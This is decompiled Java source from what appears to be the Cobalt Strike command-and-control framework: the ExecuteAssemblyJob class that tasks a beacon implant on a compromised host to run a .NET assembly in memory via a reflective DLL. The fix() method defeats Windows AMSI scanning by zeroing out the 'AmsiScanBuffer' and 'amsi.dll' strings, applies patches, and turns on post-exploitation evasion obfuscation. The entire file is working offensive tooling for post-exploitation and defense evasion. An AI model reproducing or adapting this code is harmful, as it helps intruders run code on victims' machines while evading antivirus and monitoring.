/*
 * Decompiled with CFR 0.152.
 */
package beacon.jobs;

import aggressor.DataUtils;
import beacon.CommandBuilder;
import beacon.JobHelper;
import beacon.JobSimple;
import beacon.TaskBeacon;
import beacon.jobs.PostExJobs;
import common.BeaconDataStore;
import common.BeaconEntry;
import common.BeaconOutput;
import common.Callback;
import common.CommonUtils;
import common.Packer;
import common.ReflectiveDLL;
import java.io.File;
import pe.PostExObfuscator;

public class ExecuteAssemblyJob
extends JobSimple {
    protected String file;
    protected String args;
    protected String[] patches;
    protected BeaconEntry beaconEntry;

    public ExecuteAssemblyJob(TaskBeacon taskBeacon, String string, String string2, String[] stringArray, String string3, BeaconEntry beaconEntry) {
        super(taskBeacon, string3);
        this.file = string;
        this.args = string2;
        this.patches = stringArray;
        this.beaconEntry = beaconEntry;
    }

    @Override
    public String getDescription() {
        if (this.args.length() > 0) {
            return "Tasked beacon to run .NET program: " + new File(this.file).getName() + " " + this.args;
        }
        return "Tasked beacon to run .NET program: " + new File(this.file).getName();
    }

    @Override
    public boolean usePrependLoader() {
        return true;
    }

    @Override
    public boolean ignoreToken() {
        return false;
    }

    @Override
    public String getShortDescription() {
        return ".NET assembly";
    }

    @Override
    public String getDLLName() {
        if (this.arch.equals("x86")) {
            return "resources/invokeassembly.dll";
        }
        return "resources/invokeassembly.x64.dll";
    }

    @Override
    public int getWaitTime() {
        return 20000;
    }

    @Override
    public String getJobName() {
        return PostExJobs.EXECUTE_ASSEMBLY.getJobName();
    }

    @Override
    public byte[] getArgument() {
        Packer packer = new Packer();
        this.B(packer);
        this.A(packer);
        return packer.getBytes();
    }

    private void B(Packer packer) {
        byte[] byArray = this.getDotNetBinary();
        packer.addInt(byArray.length);
        packer.append(byArray);
    }

    private void A(Packer packer) {
        packer.addWideString(this.args + '\u0000');
    }

    public byte[] getDotNetBinary() {
        return CommonUtils.readFile(this.file);
    }

    @Override
    public byte[] fix(byte[] byArray) {
        if (!this.tasker.disableAMSI()) {
            byArray = CommonUtils.zeroOut(byArray, new String[]{"AmsiScanBuffer", "amsi.dll"});
        }
        byArray = JobHelper.setupPatches(byArray, this.patches, this.arch, this.tasker, this.beaconEntry);
        return byArray;
    }

    @Override
    public void spawn(String string) {
        long l;
        BeaconEntry beaconEntry = DataUtils.getBeacon(this.tasker.getClient().getData(), string);
        BeaconDataStore beaconDataStore = beaconEntry.getDataStore();
        if (!beaconDataStore.hasResolvedItem(l = BeaconDataStore.calculateHash(this.getDataStoreObject()))) {
            super.spawn(string);
        } else {
            byte[] byArray = this.getDLLContent();
            CommandBuilder commandBuilder = new CommandBuilder();
            if (ReflectiveDLL.is64(byArray)) {
                if (this.ignoreToken()) {
                    commandBuilder.setCommand(71);
                } else {
                    commandBuilder.setCommand(88);
                }
            } else if (this.ignoreToken()) {
                commandBuilder.setCommand(70);
            } else {
                commandBuilder.setCommand(87);
            }
            commandBuilder.addShort(this.getCallbackType());
            commandBuilder.addShort(this.getWaitTime());
            commandBuilder.addInteger(0);
            commandBuilder.addLengthAndString(this.getShortDescription());
            Packer packer = new Packer();
            this.A(packer);
            this.builder.setCommand(117);
            this.builder.addInteger(beaconDataStore.getItemIndex(l));
            this.builder.addLengthAndString(commandBuilder.build());
            this.builder.addLengthAndString(packer.getBytes());
            byte[] byArray2 = this.builder.build();
            Callback callback = this.getCallbackFunction();
            if (callback == null) {
                this.tasker.task(string, byArray2, this.getDescription(), this.getTactic());
            } else {
                this.tasker.taskcb(string, byArray2, this.getDescription(), this.getTactic(), callback);
            }
            this.tasker.getClient().getConnection().call("beacons.log_write", CommonUtils.args(BeaconOutput.Task(string, "Executing the .NET program from Data Store")));
        }
    }

    public byte[] getDataStoreObject() {
        Packer packer = new Packer();
        packer.addLengthAndString(this.setupDll(this.beaconEntry.getId(), this.getDLLContent(), true));
        this.B(packer);
        return packer.getBytes();
    }

    @Override
    public void additionalObfuscations(PostExObfuscator postExObfuscator, byte[] byArray) {
        postExObfuscator.enableEvasions();
    }
}

